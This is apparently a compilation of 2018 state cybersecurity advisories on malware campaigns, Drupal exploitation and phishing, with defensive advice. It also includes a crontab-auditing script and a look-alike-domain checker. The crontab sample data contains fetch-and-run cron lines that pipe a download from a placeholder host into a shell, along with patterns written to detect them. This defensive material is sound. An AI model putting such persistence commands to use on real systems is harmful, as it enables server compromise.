Cryptocurrency-Mining Malware Infects 500,000 Machines

Qihoo 360 Total Security researchers discovered a new cryptocurrency-mining malware that crashes the system if a user attempts to remove its mining process. Dubbed WinstarNssmMiner, the malware has been leveraged in over half a million attacks in the past three days alone. Once executed, the malware creates two processes on the infected device, a mining function using the XMRig Monero miner and another process used for detecting antivirus products. If the malware detects a reputable antivirus solution, it will stop the infection attempt. The NJCCIC recommends all users review the Qihoo 360 Total Security blog for more information. Additionally, install a reputable antivirus/antimalware solution on all systems to protect against this and similar threats.

DDoS Attacks Bypassing Mitigation Solutions via the UPnP Protocol

Threat actors are circumventing DDoS (distributed denial-of-service) mitigation solutions by taking advantage of the Universal Plug and Play (UPnP) protocol to mask the source port of packets sent during a DDoS flood attack, according to DDoS mitigation firm Imperva. These attacks hide their source IPs using UPnP and then leverage DNS and NTP protocols during the DDoS flood. The NJCCIC recommends reviewing the Imperva report and disabling UPnP support for networks not using the feature.

Vega Stealer Malware Targets User Credentials and Credit Card Numbers

A new malware campaign is targeting Google Chrome and Mozilla Firefox browsers to steal credentials and other sensitive data, according to researchers at Proofpoint. Dubbed “Vega Stealer,” the malware is being spread via phishing emails targeting marketing, advertising, public relations, retail, and manufacturing companies. Attached to the email is a Word document containing malicious macros that, when enabled, download the Vega Stealer malware. Once the system is infected, the malware steals passwords, saved credit card data, autofill profile information, cookies from Chrome, and specific passwords and keys from Firefox. Additionally, Vega Stealer can take a screenshot of the victim’s system and search for files on the system that end in .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf and, if found, send these files to the threat actor’s Command and Control (C2) server. Proofpoint believes that this campaign could be connected to the same threat actors behind the Ursnif banking Trojan. The NJCCIC recommends Chrome and Firefox users and administrators review the Proofpoint report and educate end users about this and similar threats, reminding them never to click on links or open attachments delivered with unexpected or unsolicited emails. Additionally, if end users have received and taken action on these emails, isolate the affected systems from the network and perform a full system scan using a reputable anti-malware solution. Proactively monitor and change passwords to any financial, personal, or business accounts accessed on infected systems and enable multi-factor authentication where available.

Kitty Malware Infecting Vulnerable Drupal Sites

A new malware targeting vulnerable Drupal sites is installing a cryptocurrency-miner and a PHP backdoor onto compromised servers. Dubbed “Kitty” by security researchers from Imperva, the malware exploits the Drupalgeddon2 vulnerability in Drupal sites that allows a remote attacker to execute malicious code. Once an attacker gains access to the server, the popular XMRig Monero miner is installed and begins using the compromised server’s resources to mine the cryptocurrency. Along with the cryptocurrency-miner, a backdoor is installed, and the threat actor creates a time-based job scheduler that re-downloads the malicious script every minute. This process allows the malware to re-infect a server even if updates are attempted. The NJCCIC recommends all Drupal site owners and administrators review the Imperva security blog for more information, ensure all Drupal sites are up-to-date with the most recent patches, run a full system scan, and follow the recovery instructions, if necessary. Additionally, monitor network activity for anomalies indicative of cryptocurrency-mining activity. End users are encouraged to use web browsers that proactively block cryptocurrency-mining scripts or install a reputable ad-blocking, script-blocking, and coin-blocking extension in their current browser.
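The every-minute re-download job described above is the kind of persistence a crontab audit can surface during recovery. The following is an added example, not code from this advisory or from Imperva; the sample crontab, hostnames, and file paths are constructed, and the `audit` helper is hypothetical.

```python
import re

FETCH = re.compile(r"\b(curl|wget)\b")                       # downloads remote content
PIPED_EXEC = re.compile(r"\|\s*(?:ba|da)?sh\b|\|\s*php\b")   # runs what it fetched
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")        # e.g. MAILTO=""

# Constructed sample: what `crontab -l -u www-data` might return on a web server.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/local/bin/drush cron
* * * * * curl -s http://example.invalid/fetched.php -o /var/www/html/fetched.php
*/15 * * * * wget -q -O - https://updates.example.invalid/check.sh | sh
* * * * * /usr/bin/flock -n /tmp/q.lock php /var/www/html/queue.php
"""


def parse_entry(line, system=False):
    """Split a crontab line into (schedule fields, command).

    system=True handles /etc/crontab and /etc/cron.d files, which carry a
    user name between the schedule and the command.
    """
    n_sched = 1 if line.startswith("@") else 5
    extra = 1 if system else 0
    parts = line.split(None, n_sched + extra)
    if len(parts) < n_sched + extra + 1:
        return None  # malformed or truncated entry
    return parts[:n_sched], parts[-1]


def every_minute(schedule):
    return (len(schedule) == 5 and schedule[0] in ("*", "*/1")
            and all(f == "*" for f in schedule[1:]))


def audit(crontab_text, system=False):
    """Return findings for jobs that download content, worst first by schedule."""
    findings = []
    for lineno, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        entry = parse_entry(line, system)
        if entry is None:
            continue
        schedule, command = entry
        if not FETCH.search(command):
            continue  # frequent local jobs (queues, locks) are normal
        reasons = ["downloads remote content"]
        if PIPED_EXEC.search(command):
            reasons.append("pipes download into an interpreter")
        if every_minute(schedule):
            reasons.append("runs every minute")
        findings.append({
            "line": lineno,
            "severity": "high" if every_minute(schedule) else "review",
            "reasons": reasons,
            "command": command,
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CRONTAB):
        print(f["line"], f["severity"], "; ".join(f["reasons"]))
```

Run it against the crontab of the web server account as well as the files under /etc/cron.d (with `system=True`), since patching Drupal does not remove a job that is already installed.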

Gold Galleon Threat Group Targets Maritime with BEC Scheme

A threat group operating out of Nigeria, dubbed “Gold Galleon,” is targeting the global maritime shipping industry with a business email compromise (BEC) campaign – a type of social engineering scheme. The campaign involves sending targets fraudulent invoices and financial documents, using a combination of malware and social engineering techniques to steal corporate email account credentials and use these accounts to send fake payment requests and steal millions of dollars. Researchers estimate Gold Galleon attempted to steal $3.9 million between June 2017 and January 2018 alone. The maritime industry is a particularly attractive target given the amount of international business and financial transactions and communications that commonly occur. Poor cybersecurity protections also allow threat actors to be successful even when employing unsophisticated tactics and off-the-shelf tools. The NJCCIC recommends all users and administrators in the maritime industry review the Secureworks report on Gold Galleon. Organizations from all industries are encouraged to educate end users on the threat of BEC and similar social engineering schemes, implement account security features such as multi-factor authentication, observe strict wire transfer policies, and verify vendors and clients prior to conducting financial transactions. Organizations are also encouraged to implement a defense-in-depth cybersecurity strategy, employ the Principle of Least Privilege, and keep hardware and software up-to-date.

Russian APT Group Fancy Bear (APT28) Distributes Malicious Versions of LoJack Software

Researchers at Arbor Networks detected modified versions of legitimate LoJack applications that appear to be associated with the Russian APT Group Fancy Bear, also tracked as APT28 and Sofacy. LoJack software is used by organizations and individuals to track and locate devices in the case of theft and, by default, comes with a built-in persistence system. The altered versions contain minor modifications in the application’s binary which enable connections to remote C2 domains believed to be associated with Fancy Bear operations. Because the alterations are minor, many antivirus systems do not detect the affected software versions. Although distribution methods are currently unknown, the malicious LoJack applications are likely distributed via spear-phishing emails crafted to trick recipients into downloading and installing LoJack. The NJCCIC recommends network administrators review the Arbor Networks report and scan their networks for associated IoCs. We also strongly recommend that all email users maintain awareness of emerging phishing campaigns and avoid clicking on links or opening attachments delivered with unexpected or unsolicited emails. If any end users have taken action on emails from this campaign, isolate the affected system from the network immediately and perform a full system scan using a reputable anti-malware solution. Proactively monitor and change passwords to any financial, personal, or business accounts accessed on infected systems and enable multi-factor authentication where available.

PoC Code Can Crash a Windows System Via a USB Drive

Proof-of-concept (PoC) code was published on GitHub that can be used to crash most Windows operating systems in seconds by exploiting a vulnerability in Microsoft’s handling of NTFS (New Technology File System) images. Placing a malformed NTFS image on a USB drive and plugging it into a targeted Windows system, including those in locked mode, will crash the system and result in the Blue Screen of Death. Even systems with auto-play disabled for removable media will crash when Windows Defender scans the USB drive. The researcher also claims the code could be delivered through malware. While the code works on most Windows operating systems, the vulnerability it exploits appears to be fixed for the most recent Windows 10 release. Because of these risks, the NJCCIC recommends organizations minimize, or possibly eliminate, the use of USB devices and similar removable media. To defend against malware, organizations are encouraged to implement a defense-in-depth cybersecurity strategy, employ the Principle of Least Privilege, establish strong identity and access management controls, including multi-factor authentication, and keep hardware and software up-to-date.

FacexWorm Malware Spreading via Facebook Messenger

Trend Micro researchers have discovered a new malware variant spreading to Facebook users. Dubbed FacexWorm, the malware is distributed via a malicious link in a Facebook Messenger chat. If clicked, the link redirects users to a fake YouTube page where they are instructed to install a YouTube-themed Chrome extension in their browser. When downloaded, the extension conducts a number of malicious activities. The malware can steal login credentials when the user accesses certain sites and sends those credentials to C2 servers controlled by the threat actor. If the victim accesses any of the 52 cryptocurrency-related sites hardcoded into the extension, they are redirected to a web page that asks them to verify their account by sending Ether cryptocurrency to an account controlled by the threat actor. If any transactions are performed on these sites, FacexWorm can replace the recipient’s cryptocurrency wallet address with one linked to the threat actor. The extension also injects an obfuscated Coinhive script onto the infected system, using the system’s CPU resources to mine cryptocurrency. This campaign is perpetuated by using the compromised user’s Facebook account to send their friends the same malicious link via Facebook Messenger. The NJCCIC recommends Facebook users review the Trend Micro report and exercise increased caution when using social media platforms and avoid clicking on links in unexpected messages until their legitimacy has been verified by the message sender. Additionally, we recommend users and administrators install browser extensions directly from official browser stores, run updated antivirus software, proactively block outbound connections to the domains coinhive[.]com and coin-hive[.]com, and monitor network activity for anomalies that indicate cryptocurrency-mining activity. 

Remote Code Execution Vulnerability in Drupal Exploited in the Wild

Just over a week after threat actors began exploiting a critical Drupal vulnerability, dubbed “Drupalgeddon2,” a separate critical vulnerability (CVE-2018-7602) in Drupal was disclosed by the Drupal CMS team on April 25 and then exploited just five hours later. Successful exploitation of this vulnerability could allow a remote threat actor to execute code and take complete control of the compromised site. Drupal Core versions prior to 7.59, 8.5.3, and 8.4.8 are affected; there are at least 2,700 Drupal-powered sites hosted in New Jersey that may be vulnerable if left unpatched. The NJCCIC recommends all Drupal site owners and administrators review the Drupal Core Security Advisory and update their sites to version 7.59 or 8.5.3 as soon as possible. Although Drupal 8.4.x versions are no longer supported by Drupal, version 8.4.8 was released to address the vulnerability.

Stresspaint Malware

Researchers at Radware discovered a trojan inside the free Windows application “Relieve Stress Paint.” Dubbed “Stresspaint,” the malware is distributed via Facebook and email spam messages directing users to аоӏ[.]net, a website domain impersonating the real aol[.]net by using Unicode characters. When converted to punycode, the website domain actually spells out 80a2a18a[.]net. If a user downloads the application from this site, they receive a legitimate drawing tool; however, the app also runs malicious files in the background, allowing the malware to set a Windows registry key that executes a .exe file every time the device boots to maintain persistence. The malware collects details on the user’s Facebook account, Chrome login data and session cookies, and their Globally Unique Identifier (GUID), and sends this information to the threat actor’s C2 server. The NJCCIC recommends users review the BleepingComputer article, verify the URL of websites they visit to ensure their legitimacy, avoid downloading applications and other software from third-party sites, and run an up-to-date antivirus solution on all devices.
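The look-alike domain above can be checked mechanically. This added example (not part of the advisory or the Radware research) converts between the displayed Unicode form and the `xn--` form that appears in DNS and proxy logs, and compares a de-confused "skeleton" against a watch list; the `PROTECTED` list and the three-entry `CONFUSABLES` map are constructed for illustration.

```python
import unicodedata

# Constructed for this example: a one-entry watch list and a tiny confusables
# map. Production checks would load the Unicode confusables data instead.
PROTECTED = {"aol.net"}
CONFUSABLES = {
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u04cf": "l",  # CYRILLIC SMALL LETTER PALOCHKA
}


def to_ace(domain):
    """Encode each non-ASCII label as its xn-- (punycode) form."""
    labels = []
    for label in domain.lower().split("."):
        if label.isascii():
            labels.append(label)
        else:
            labels.append("xn--" + label.encode("punycode").decode("ascii"))
    return ".".join(labels)


def from_ace(domain):
    """Decode xn-- labels back to the Unicode text a user would see."""
    labels = []
    for label in domain.lower().split("."):
        if label.startswith("xn--"):
            labels.append(label[4:].encode("ascii").decode("punycode"))
        else:
            labels.append(label)
    return ".".join(labels)


def label_scripts(domain):
    """Per label, the set of scripts in use (first word of each char name)."""
    return [
        {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}
        for label in domain.split(".")
    ]


def assess(domain):
    """Classify a domain seen in a proxy or DNS log (either form accepted)."""
    shown = from_ace(domain)
    skeleton = "".join(CONFUSABLES.get(ch, ch) for ch in shown)
    scripts = label_scripts(shown)
    hit = skeleton in PROTECTED and shown not in PROTECTED
    return {
        "ace": to_ace(shown),
        "scripts": scripts,
        # A label written entirely in one foreign script is NOT mixed-script,
        # so this common check alone does not catch the domain above.
        "mixed_script_label": any(len(s) > 1 for s in scripts),
        "impersonates": skeleton if hit else None,
    }


if __name__ == "__main__":
    for d in ("xn--80a2a18a.net", "aol.net"):
        print(d, assess(d))
```

The first label of the look-alike is entirely Cyrillic, so a mixed-script test passes it; the skeleton comparison is what ties it back to aol.net.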


Vulnerability CVE-2018-7600 discovered in March by the Drupal CMS team, dubbed “Drupalgeddon2,” is being exploited by threat actors who are using the flaw to infect servers with backdoor scripts and cryptocurrency-mining software. In early April, a Russian security researcher published proof-of-concept (PoC) code for the vulnerability, sparking scans for vulnerable sites within hours of publication. Information security researchers have also reported that botnets controlled by criminal groups are exploiting the vulnerability. There are at least 3,300 Drupal-powered sites hosted in New Jersey. Site administrators are advised to ensure they are running patched version 7.58 or 8.5.1. The NJCCIC recommends all Drupal site owners and administrators review the Drupal Core highly critical public service announcement and follow the recovery instructions if necessary, review the previous NJCCIC advisory on Drupalgeddon2, and update their sites to the most recent patched version immediately.

FormBook Malware

Researchers at Menlo Security recently uncovered a new campaign targeting US and Middle East financial and information service sectors. This malware campaign delivers FormBook to targets via emails containing Microsoft Word attachments and does not require the recipient to enable macros in order to start malicious activities. FormBook bypasses security measures as the malicious component is hosted on a remote server and the document delivered to victims does not contain active malicious code or shellcode. This malware exploits CVE-2017-8570, a vulnerability in Microsoft Office that allows for execution without enabling macros, and it also utilizes design flaws in the document formats .docx and RTF. Microsoft patched this vulnerability in July of 2017. The NJCCIC recommends users and administrators ensure all Microsoft Office products are up-to-date with the latest patches.

NetSupport Manager Remote Control Software Delivered in Malicious Campaign

FireEye recently identified a new malicious operation that leverages compromised websites to install the NetSupport Manager remote control software on systems, unbeknownst to users. When visited, these websites prompt the user to download and install the NetSupport Manager executable disguised as updates for popular applications such as Adobe Flash, Chrome, and Firefox. Since this remote access software is a legitimate tool commonly used by administrators to gain authorized remote access to computers on a network, it may evade antivirus detection when delivered by this campaign, especially if the tool has been whitelisted in the environment. The NJCCIC recommends all network administrators review FireEye’s report for additional information and scan all systems for the associated indicators of compromise (IoCs). Current users and administrators of the NetSupport Manager remote control software are encouraged to audit all instances of the software on their network to ensure secure configurations and help differentiate between legitimate and potentially malicious installations.

Matrix Ransomware Distributed Via Compromised Remote Desktop Services

MalwareHunterTeam recently discovered two new variants of the Matrix ransomware that are distributed via compromised Remote Desktop services. First detected in 2016, Matrix was previously delivered to victims through an exploit kit known as RIG. In this current campaign, threat actors scan for machines that have their Remote Desktop Protocol (RDP) ports open and exposed to the internet. Once a vulnerable system is located, a brute-force attack is launched against the login credentials used for remote access. If the attack is successful, Matrix ransomware will be installed and executed on the target computer. Despite some differences, both new versions of Matrix encrypt filenames and unmapped network shares, clear Volume Shadow Copies, and display status windows during the encryption process. Encrypted filenames will be appended with [Files4463[@]tuta[.]io] or [RestorFile[@]tutanota[.]com], depending on which variant infects the machine. The NJCCIC recommends all users and administrators running Remote Desktop services review the NJCCIC Threat Analysis titled Remote Access: Open Ports Create Targets of Opportunity, Undue Risk and take proactive steps to reduce their exposure to network compromise as a result of insecure remote access configurations. We also recommend all members and organizations download our PDF titled Ransomware: Risk Mitigation Strategies to learn how to protect data, systems, and networks from ransomware.

Bing Search Results Display Malicious Chrome Advertisements

Lawrence Abrams of Bleeping Computer reports observing the Bing search engine display Google Chrome advertisements designed to redirect users to a website that delivers installers for adware and Potentially Unwanted Programs (PUPs). These misleading advertisements appear as a top result when a user searches for the phrase “chrome download” using Bing. Although the advertisements appear to lead to Google’s authentic website, the ads actually direct users to the site www[.]googlechrome2018[.]net, designed to lure users into downloading an InstallCore bundle masquerading as ChromeSetup.exe. If users already have Chrome installed on their system, they will be prompted to download and install a “Search Manager” extension. If the Chrome extensions are installed, additional prompts will appear for Chrome extensions, anti-malware PUPs, and other programs that may negatively impact device performance and security. The NJCCIC recommends installing applications from the official Chrome Web Store by directly typing the web address into the URL field. If users have downloaded and installed the affected programs, we recommend uninstalling them immediately and scanning affected devices with a reputable antivirus solution.

At least 1,000 Magento-Powered Sites Compromised

E-commerce sites running on the Magento platform are being compromised by profit-motivated criminals via brute-force attacks against administrator panels using common and default Magento credentials. So far, at least 1,000 Magento sites have been impacted and infected with malicious scripts designed to steal payment card data or deliver additional malware, according to security researchers at Flashpoint. The compromised sites are being exploited to mine cryptocurrency, log payment card data via card-scraping malware such as AZORult, and to redirect visitors to malicious sites that attempt to install malware onto systems via a fraudulent Adobe Flash update. The majority of the identified compromised sites are associated with the education and healthcare sectors and hosted on servers in the US and Europe. At least 365 sites hosted on servers within New Jersey are running Magento and could potentially become targets of this attack if not secured with unique, lengthy, and complex administrator credentials. The NJCCIC recommends all administrators of Magento-powered sites review the Flashpoint blog for additional information, including indicators of compromise (IoCs) and the associated Yara rule, and follow the recommendations outlined in the Magento Security Best Practices guide to secure their websites against this and other attacks.

Destructive Trojan SHARPKNOT Used by North Korean APT Group

On March 28, the National Cybersecurity and Communications Integration Center (NCCIC) released a Malware Analysis Report (MAR) detailing analysis from the US DHS and FBI on a newly identified trojan variant dubbed “SHARPKNOT,” used in cyber operations conducted by North Korean advanced persistent threat (APT) group HIDDEN COBRA, aka Lazarus Group. The malware targets systems running Windows OS and is executed via the command line. Once executed, the malware first attempts to disable the “System Event Notification” and the “Alerter” services, the latter of which is only present in End-of-Life (EOL) operating systems Windows XP and Windows 2003. The malware then overwrites and deletes the Master Boot Record (MBR) and deletes files on mapped network shares and physically connected storage devices. Once the malware has deleted these files, the system is rebooted and left inoperable. The NJCCIC recommends those who could be considered targets for North Korean APT cyber operations review the NCCIC MAR for more information on the SHARPKNOT trojan, scan their network using the YARA rule and Indicators of Compromise (IoCs) provided, and add the STIX file to their threat intelligence sharing platform. If your organization has been impacted by the activity outlined in the MAR, the NJCCIC recommends immediately removing the affected systems from your network and contacting the NJCCIC via the Cyber Incident Report Form or by calling 609-963-6900 ext. 7865. Organizations are strongly encouraged to implement a defense-in-depth cybersecurity strategy; employ the Principle of Least Privilege; keep antivirus, hardware, and software up-to-date; disable unnecessary services on workstations and servers; and establish strong identity and access management controls, including multi-factor authentication.
Additionally, users and administrators can better protect their MBR by installing MBR Filter, a Windows disk filter released by Cisco Talos that blocks write access to the MBR, available on GitHub. The NJCCIC makes no claim as to the effectiveness of this tool and users are advised to exercise caution when downloading and installing any software from the internet.

GhostMiner Fileless Malware Targets WebLogic Servers

Oracle WebLogic WLS-WSAT vulnerability CVE-2017-10271 is currently being exploited to deliver a fileless cryptocurrency miner to vulnerable servers. Security researchers with Minerva Labs detected the malware, dubbed GhostMiner, which uses two PowerShell scripts to infect victims with a variant of the XMRig Monero miner. Once executed, GhostMiner will terminate any other cryptocurrency miners detected on the same host. At the time of writing, GhostMiner has reportedly generated 1.03 Monero, the equivalent of approximately $200 USD. The NJCCIC recommends reviewing the Minerva report for additional information and Indicators of Compromise (IoCs). Additionally, we recommend all users and administrators of systems using Oracle products review their website for any necessary updates. For additional information about fileless intrusions, please review the NJCCIC Threat Analysis product titled Fileless: Evasive Intrusion Tactics Pose Challenge for Network Defense.

Malicious Apps Delivering Adware Found in Google Play Store

A SophosLabs researcher discovered two new Android malware variants hidden inside apps available for download in the Google Play store. The first variant, dubbed “Guerilla,” was found in 15 seemingly-legitimate apps and is described as a fully functioning backdoor, allowing threat actors to download additional malware onto infected devices. The threat actors push aggressive ad-click plugins to the victims, covertly generating ad revenue for the perpetrators. The second malware, dubbed “HiddnAd,” was hidden in seven different apps, including six QR code-reading apps and one “smart compass” app. The malicious apps were downloaded hundreds of thousands of times and bypassed security in the Play store by delaying malicious activity until six hours after installation. Once the malicious activity began, pop-up advertisements would display on the victim’s device as well as Android notifications containing links that, if clicked, generated ad revenue for the threat actors. Google has since removed the infected apps from the Play store. The NJCCIC recommends Android users review the Sophos reports on the Guerilla and HiddnAd malware variants for a list of affected apps and, if installed, immediately remove the apps from the device. Additionally, we recommend running a reputable antivirus application on all devices, refraining from downloading apps that require excessive device permissions, promptly removing apps that execute unexpected or unwanted behavior, and keeping all device software and apps updated to the most recent version.

GoScanSSH Targets Linux-Based SSH Servers

A new malware variant, dubbed GoScanSSH by Cisco Talos researchers, attempts to compromise Linux-based SSH servers that are exposed to the internet and join them to a botnet. Written in the Go programming language, GoScanSSH uses a previously infected device to scan randomly generated IP addresses for open SSH ports, attempts to establish an SSH connection with an identified target, and then gathers information about the domains associated with it. Researchers have determined that GoScanSSH compares these associated domains and IP addresses with an internal blacklist to avoid compromising military and government-based servers. When the malware finds a viable target with an open SSH port, an SSH credential brute-force attack is initiated using a word list containing over 7,000 common username and password combinations, mostly comprised of weak or default device credentials. If a credential match is found and access can be obtained, a unique GoScanSSH malware binary will then be installed on the system. After the malware gathers information on the infected device, it begins searching for new devices to compromise. The NJCCIC recommends administrators of Linux-based systems with open and publicly exposed SSH ports review the Talos report for additional information and Indicators of Compromise (IoCs), change any and all default account credentials, ensure systems have unique and complex account credentials, and close port 22 if it is not needed. If SSH is needed in your environment, consider implementing IP whitelisting and a multi-factor authentication solution to protect against brute-force attacks.